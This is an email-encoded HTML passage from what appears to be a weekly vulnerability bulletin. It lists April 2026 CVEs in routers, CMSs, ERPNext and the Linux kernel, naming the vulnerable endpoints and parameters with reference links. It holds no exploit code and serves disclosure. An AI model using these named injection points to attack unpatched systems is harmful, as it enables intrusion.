<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30818" target=3D= "_blank" rel=3D"noopener">CVE-2026-30818</a></td>

<a href=3D"https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firm= ware" target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/my/support= /download/archer-ax53/v1/#Firmware</a><br><a href=3D"https://www.tp-link.co= m/en/support/download/archer-ax53/v1/#Firmware" target=3D"_blank" rel=3D"no= opener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmwar= e</a><br><a href=3D"https://talosintelligence.com/vulnerability_reports/" t= arget=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulnerabili= ty_reports/</a><br><a href=3D"https://www.tp-link.com/us/support/faq/5055/"=
target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/us/support/faq/= 5055/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>A Server-Side Request Forgery (SSRF) vulnerability exists in the Print = Format functionality of ERPNext v16.0.1 and Frappe Framework v16.1.1, where=
user-supplied HTML is insufficiently sanitized before being rendered into = PDF. When generating PDFs from user-controlled HTML content, the applicatio=
n allows the inclusion of HTML elements such as &lt;iframe&gt; that referen=
ce external resources. The PDF rendering engine automatically fetches these=
resources on the server side. An attacker can abuse this behavior to force=
the server to make arbitrary HTTP requests to internal services, including=
cloud metadata endpoints, potentially leading to sensitive information dis= closure.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31017" target=3D= "_blank" rel=3D"noopener">CVE-2026-31017</a></td>

<a href=3D"http://frappe.com" target=3D"_blank" rel=3D"noopener">http://fra= ppe.com</a><br><a href=3D"https://github.com/PhDg1410/CVE/tree/main/CVE-202= 6-31017" target=3D"_blank" rel=3D"noopener">https://github.com/PhDg1410/CVE= /tree/main/CVE-2026-31017</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>A vulnerability was identified in stata-mcp prior to v1.13.0 where insu= fficient validation of user-supplied Stata do-file content can lead to comm= and execution.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31040" target=3D= "_blank" rel=3D"noopener">CVE-2026-31040</a></td>

<a href=3D"https://github.com/SepineTam/stata-mcp/issues/20" target=3D"_bla= nk" rel=3D"noopener">https://github.com/SepineTam/stata-mcp/issues/20</a><b= r><a href=3D"https://github.com/SepineTam/stata-mcp/pull/21" target=3D"_bla= nk" rel=3D"noopener">https://github.com/SepineTam/stata-mcp/pull/21</a><br>=
<a href=3D"https://github.com/SepineTam/stata-mcp/commit/52413ce" target=3D= "_blank" rel=3D"noopener">https://github.com/SepineTam/stata-mcp/commit/524= 13ce</a><br><a href=3D"https://github.com/SepineTam/stata-mcp/releases/tag/= v1.13.0" target=3D"_blank" rel=3D"noopener">https://github.com/SepineTam/st= ata-mcp/releases/tag/v1.13.0</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>A double free vulnerability exists in librz/bin/format/le/le.c in the f= unction le_load_fixup_record(). When processing malformed or circular LE fi= xup chains, relocation entries may be freed multiple times during error han= dling. A specially crafted LE binary can trigger heap corruption and cause = the application to crash, resulting in a denial-of-service condition. An at= tacker with a crafted binary could cause a denial of service when the tool =
is integrated on a service pipeline.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31053" target=3D= "_blank" rel=3D"noopener">CVE-2026-31053</a></td>

<a href=3D"https://github.com/rizinorg/rizin/issues/5753" target=3D"_blank"=
rel=3D"noopener">https://github.com/rizinorg/rizin/issues/5753</a><br><a h= ref=3D"https://github.com/rizinorg/rizin/pull/5795" target=3D"_blank" rel= =3D"noopener">https://github.com/rizinorg/rizin/pull/5795</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 1200GW</td>
<td>UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a b= uffer overflow in the timeRangeName parameter of the formConfigDnsFilterGlo= bal function. This vulnerability allows attackers to cause a Denial of Serv= ice (DoS) via a crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31058" target=3D= "_blank" rel=3D"noopener">CVE-2026-31058</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/2.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/2.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 520W</td>
<td>A remote command execution (RCE) vulnerability in the /goform/formDia c= omponent of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to e= xecute arbitrary commands via a crafted string.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31059" target=3D= "_blank" rel=3D"noopener">CVE-2026-31059</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/9.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/9.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 810G</td>
<td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a b= uffer overflow in the notes parameter of the formGroupConfig function. This=
vulnerability allows attackers to cause a Denial of Service (DoS) via a cr= afted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31060" target=3D= "_blank" rel=3D"noopener">CVE-2026-31060</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/5.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/5.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 810G</td>
<td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a b= uffer overflow in the timestart parameter of the ConfigAdvideo function. Th=
is vulnerability allows attackers to cause a Denial of Service (DoS) via a = crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31061" target=3D= "_blank" rel=3D"noopener">CVE-2026-31061</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/1.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/1.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 510W</td>
<td>UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer = overflow in the filename parameter of the formFtpServerDirConfig function. = This vulnerability allows attackers to cause a Denial of Service (DoS) via =
a crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31062" target=3D= "_blank" rel=3D"noopener">CVE-2026-31062</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/7.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/7.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 1200GW</td>
<td>UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a b= uffer overflow in the pools parameter of the formArpBindConfig function. Th=
is vulnerability allows attackers to cause a Denial of Service (DoS) via a = crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31063" target=3D= "_blank" rel=3D"noopener">CVE-2026-31063</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/4.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/4.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 520W</td>
<td>UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer = overflow in the addCommand parameter of the formConfigCliForEngineerOnly fu= nction. This vulnerability allows attackers to cause a Denial of Service (D= oS) via a crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31065" target=3D= "_blank" rel=3D"noopener">CVE-2026-31065</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/8.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/8.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Aggressive HiPER Router 810G</td>
<td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a b= uffer overflow in the selDateType parameter of the formTaskEdit function. T= his vulnerability allows attackers to cause a Denial of Service (DoS) via a=
crafted input.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31066" target=3D= "_blank" rel=3D"noopener">CVE-2026-31066</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/6.md" target=3D"_= blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/6.md= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- UTT Aggressive 520W</td>
<td>A remote command execution (RCE) vulnerability in the /goform/formRelea= seConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers=
to execute arbitrary commands via a crafted string.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31067" target=3D= "_blank" rel=3D"noopener">CVE-2026-31067</a></td>

<a href=3D"https://github.com/zxq0408/Vul202601/blob/main/10.md" target=3D"= _blank" rel=3D"noopener">https://github.com/zxq0408/Vul202601/blob/main/10.= md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Kaleris YMS</td>
<td>Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated a= ttackers with only the shipping/receiving role to view the truck's dashboar=
d resources.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31150" target=3D= "_blank" rel=3D"noopener">CVE-2026-31150</a></td>

<a href=3D"https://kaleris.com/solutions/yard-management/" target=3D"_blank=
" rel=3D"noopener">https://kaleris.com/solutions/yard-management/</a><br><a=
href=3D"https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150" t= arget=3D"_blank" rel=3D"noopener">https://github.com/Henkel-CyberVM/CVEs/tr= ee/main/CVE-2026-31150</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Kaleris YMS</td>
<td>An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attacker=
s to bypass login verification to access the application 's resources.</td> <td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31151" target=3D= "_blank" rel=3D"noopener">CVE-2026-31151</a></td>

<a href=3D"https://kaleris.com/solutions/yard-management/" target=3D"_blank=
" rel=3D"noopener">https://kaleris.com/solutions/yard-management/</a><br><a=
href=3D"https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151" t= arget=3D"_blank" rel=3D"noopener">https://github.com/Henkel-CyberVM/CVEs/tr= ee/main/CVE-2026-31151</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Bynder[.]com -- Bynder v0.1.394</td>
<td>A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 al= lows attackers to execute arbitrary web scripts or HTML via a crafted paylo= ad.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31153" target=3D= "_blank" rel=3D"noopener">CVE-2026-31153</a></td>

<a href=3D"https://www.bynder.com/en/" target=3D"_blank" rel=3D"noopener">h= ttps://www.bynder.com/en/</a><br><a href=3D"https://github.com/Henkel-Cyber= VM/CVEs/tree/main/CVE-2026-31153" target=3D"_blank" rel=3D"noopener">https:= //github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">Totolink[.]net -- A3300R router</td>
<td>An issue was discovered in ToToLink A3300R firmware v17.0.0cu.557_B2022= 1024 allowing attackers to execute arbitrary commands via the stun-pass par= ameter to /cgi-bin/cstecgi.cgi.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31170" target=3D= "_blank" rel=3D"noopener">CVE-2026-31170</a></td>

<a href=3D"https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300= r-stun-pass-cmd-injection" target=3D"_blank" rel=3D"noopener">https://githu= b.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injectio= n</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Altenar[.]com -- Sportsbook Software Platform = SB2 v.2.0</td>
<td>Cross Site Scripting vulnerability in Altenar Sportsbook Software Platf= orm (SB2) v.2.0 allows a remote attacker to obtain sensitive information an=
d execute arbitrary code via the URL parameter</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31262" target=3D= "_blank" rel=3D"noopener">CVE-2026-31262</a></td>

<a href=3D"https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_= Platform_SB2/ORtoXSS" target=3D"_blank" rel=3D"noopener">https://github.com= /nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS</a><br><=
a href=3D"https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_P= latform_SB2/ORtoXSS/ORtoXSS.txt" target=3D"_blank" rel=3D"noopener">https:/= /github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoX= SS/ORtoXSS.txt</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>megagao production_ssm v1.0 contains an authorization bypass vulnerabil= ity in the user addition functionality. The insert() method in UserControll= er.java lacks authentication checks, allowing unauthenticated attackers to = create super administrator accounts by directly accessing the /user/insert = endpoint. This leads to complete system compromise.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31271" target=3D= "_blank" rel=3D"noopener">CVE-2026-31271</a></td>

<a href=3D"https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Una= uthorized.md" target=3D"_blank" rel=3D"noopener">https://github.com/clockw1= se0v0/Vul/blob/main/production_ssm/Unauthorized.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>MRCMS 3.1.2 contains an access control vulnerability. The save() method=
in src/main/java/org/marker/mushroom/controller/UserController.java lacks = proper authorization validation, enabling direct addition of super administ= rator accounts without authentication.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31272" target=3D= "_blank" rel=3D"noopener">CVE-2026-31272</a></td>

<a href=3D"https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized= .md" target=3D"_blank" rel=3D"noopener">https://github.com/clockw1se0v0/Vul= /blob/main/MRCMS/Unauthorized.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>An authenticated stored cross-site scripting (XSS) vulnerability in the=
creation/editing module of Feehi CMS v2.1.1 allows attackers to execute ar= bitrary web scripts or HTML via injecting a crafted payload into the Conten=
t field.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31313" target=3D= "_blank" rel=3D"noopener">CVE-2026-31313</a></td>

<a href=3D"http://feehi.com" target=3D"_blank" rel=3D"noopener">http://feeh= i.com</a><br><a href=3D"https://github.com/liufee/cms/issues/80" target=3D"= _blank" rel=3D"noopener">https://github.com/liufee/cms/issues/80</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>An authenticated stored cross-site scripting (XSS) vulnerability in Fee=
hi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via=
injecting a crafted payload into the Page Sign parameter.</td> <td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31350" target=3D= "_blank" rel=3D"noopener">CVE-2026-31350</a></td>

<a href=3D"https://github.com/liufee/cms" target=3D"_blank" rel=3D"noopener= ">https://github.com/liufee/cms</a><br><a href=3D"https://github.com/liufee= /cms/issues/82" target=3D"_blank" rel=3D"noopener">https://github.com/liufe= e/cms/issues/82</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>An authenticated stored cross-site scripting (XSS) vulnerability in the=
creation/editing module of Feehi CMS v2.1.1 allows attackers to execute ar= bitrary web scripts or HTML via injecting a crafted payload into the Title = parameter.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31351" target=3D= "_blank" rel=3D"noopener">CVE-2026-31351</a></td>

<a href=3D"https://github.com/liufee/cms" target=3D"_blank" rel=3D"noopener= ">https://github.com/liufee/cms</a><br><a href=3D"https://github.com/liufee= /cms/issues/81" target=3D"_blank" rel=3D"noopener">https://github.com/liufe= e/cms/issues/81</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>An authenticated stored cross-site scripting (XSS) vulnerability in the=
Role Management module of Feehi CMS v2.1.1 allows attackers to execute arb= itrary web scripts or HTML via injecting a crafted payload into the Role Na=
me parameter.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31352" target=3D= "_blank" rel=3D"noopener">CVE-2026-31352</a></td>

<a href=3D"https://github.com/liufee/cms" target=3D"_blank" rel=3D"noopener= ">https://github.com/liufee/cms</a><br><a href=3D"https://github.com/liufee= /cms/issues/83" target=3D"_blank" rel=3D"noopener">https://github.com/liufe= e/cms/issues/83</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>An authenticated stored cross-site scripting (XSS) vulnerability in the=
Category module of Feehi CMS v2.1.1 allows attackers to execute arbitrary = web scripts or HTML via injecting a crafted payload into the Name parameter= .</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31353" target=3D= "_blank" rel=3D"noopener">CVE-2026-31353</a></td>

<a href=3D"https://github.com/liufee/cms" target=3D"_blank" rel=3D"noopener= ">https://github.com/liufee/cms</a><br><a href=3D"https://github.com/liufee= /cms/issues/84" target=3D"_blank" rel=3D"noopener">https://github.com/liufe= e/cms/issues/84</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Feehi CMS</td>
<td>Multiple authenticated stored cross-site scripting (XSS) vulnerabilitie=
s in the Permissions module of Feehi CMS v2.1.1 allows attackers to execute=
arbitrary web scripts or HTML via injecting a crafted payload into the Gro= up, Category or Description parameters.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31354" target=3D= "_blank" rel=3D"noopener">CVE-2026-31354</a></td>

<a href=3D"https://github.com/liufee/cms" target=3D"_blank" rel=3D"noopener= ">https://github.com/liufee/cms</a><br><a href=3D"https://github.com/liufee= /cms/issues/85" target=3D"_blank" rel=3D"noopener">https://github.com/liufe= e/cms/issues/85</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: med= ia: dvb-net: fix OOB access in ULE extension header tables The ule_mandator= y_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_e= xtension() are declared with 255 elements (valid indices 0-254), but the in= dex htype is derived from network-controlled data as (ule_sndu_type &amp; 0= x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds re=
ad occurs on the function pointer table, and the OOB value may be called as=
a function pointer. Add a bounds check on htype against the array size bef= ore either table is accessed. Out-of-range values now cause the SNDU to be = discarded.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31405" target=3D= "_blank" rel=3D"noopener">CVE-2026-31405</a></td>

<a href=3D"https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9= e732eff8" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8</a><br><a href=3D"https://git.ke= rnel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a= 1cc1f96e59f5abc30</a><br><a href=3D"https://git.kernel.org/stable/c/145e50c= 2c700fa52b840df7bab206043997dd18e" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e</a><br>=
<a href=3D"https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8= a9256fbe" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe</a><br><a href=3D"https://git.ke= rnel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a90= 6627433be1fe38a92</a><br><a href=3D"https://git.kernel.org/stable/c/24d8771= 2727a5017ad142d63940589a36cd25647" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: xfr=
m: Fix work re-schedule after cancel in xfrm_nat_keepalive_net_fini() After=
cancel_delayed_work_sync() is called from xfrm_nat_keepalive_net_fini(), x= frm_state_fini() flushes remaining states via __xfrm_state_delete(), which = calls xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work.=
The following is a simple race scenario: cpu0 cpu1 cleanup_net() [Round 1]=
ops_undo_list() xfrm_net_exit() xfrm_nat_keepalive_net_fini() cancel_delay= ed_work_sync(nat_keepalive_work); xfrm_state_fini() xfrm_state_flush() xfrm= _state_delete(x) __xfrm_state_delete(x) xfrm_nat_keepalive_state_updated(x)=
schedule_delayed_work(nat_keepalive_work); rcu_barrier(); net_complete_fre= e(); net_passive_dec(net); llist_add(&amp;net-&gt;defer_free_list, &amp;def= er_free_list); cleanup_net() [Round 2] rcu_barrier(); net_complete_free() k= mem_cache_free(net_cachep, net); nat_keepalive_work() // on freed net To pr= event this, cancel_delayed_work_sync() is replaced with disable_delayed_wor= k_sync().</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31406" target=3D= "_blank" rel=3D"noopener">CVE-2026-31406</a></td>

<a href=3D"https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c110= 51543ec1" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/32d0f44c2f14d60fe8e920e69a28c11051543ec1</a><br><a href=3D"https://git.ke= rnel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83a= bd9d0396d04b87792</a><br><a href=3D"https://git.kernel.org/stable/c/21f2fc4= 9ca6faa393c31da33b8a4e6c41fc84c13" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13</a><br>=
<a href=3D"https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc= 1d6b3c90" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: net= filter: conntrack: add missing netlink policy validations Hyunwoo Kim repor=
ts out-of-bounds access in sctp and ctnetlink. These attributes are used by=
the kernel without any validation. Extend the netlink policies accordingly=
. Quoting the reporter: nlattr_to_sctp() assigns the user-supplied CTA_PROT= OINFO_SCTP_STATE value directly to ct-&gt;proto.sctp.state without checking=
that it is within the valid range. [..] and: ... with exp-&gt;dir =3D 100,=
the access at ct-&gt;master-&gt;tuplehash[100] reads 5600 bytes past the s= tart of a 320-byte nf_conn object, causing a slab-out-of-bounds read confir= med by UBSAN.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31407" target=3D= "_blank" rel=3D"noopener">CVE-2026-31407</a></td>

<a href=3D"https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d= 8266ea7d" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/0fbae1e74493d5a160a70c51aeba035d8266ea7d</a><br><a href=3D"https://git.ke= rnel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3= fe60f0b3d8ad5ba05</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: Blu= etooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hol=
d sco_recv_frame() reads conn-&gt;sk under sco_conn_lock() but immediately = releases the lock without holding a reference to the socket. A concurrent c= lose() can free the socket between the lock release and the subsequent sk-&= gt;sk_state access, resulting in a use-after-free. Other functions in the s= ame file (sco_sock_timeout(), sco_conn_del()) correctly use sco_sock_hold()=
to safely hold a reference under the lock. Fix by using sco_sock_hold() to=
take a reference before releasing the lock, and adding sock_put() on all e= xit paths.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31408" target=3D= "_blank" rel=3D"noopener">CVE-2026-31408</a></td>

<a href=3D"https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374= 714bb9de" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/b0a7da0e3f7442545f071499beb36374714bb9de</a><br><a href=3D"https://git.ke= rnel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58= e7ab2fff4f611b8f1</a><br><a href=3D"https://git.kernel.org/stable/c/108b815= 14d8f2535eb16651495cefb2250528db3" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3</a><br>=
<a href=3D"https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8= cd21b11e" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e</a><br><a href=3D"https://git.ke= rnel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/e76e8f0581ef555eacc11db= b095e602fb30a5361</a><br><a href=3D"https://git.kernel.org/stable/c/598dbba= 9919c5e36c54fe1709b557d64120cb94b" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: ksm= bd: unset conn-&gt;binding on failed binding request When a multichannel SM= B2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails ksmbd set=
s conn-&gt;binding =3D true but never clears it on the error path. This lea= ves the connection in a binding state where all subsequent ksmbd_session_lo= okup_all() calls fall back to the global sessions table. This fix it by cle= aring conn-&gt;binding =3D false in the error path.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31409" target=3D= "_blank" rel=3D"noopener">CVE-2026-31409</a></td>

<a href=3D"https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b= 21cb7f4e" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/d073870dab8f6dadced81d13d273ff0b21cb7f4e</a><br><a href=3D"https://git.ke= rnel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899= ebb9ae394206fe921</a><br><a href=3D"https://git.kernel.org/stable/c/89afe5e= 2dbea6e9d8e5f11324149d06fa3a4efca" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca</a><br>=
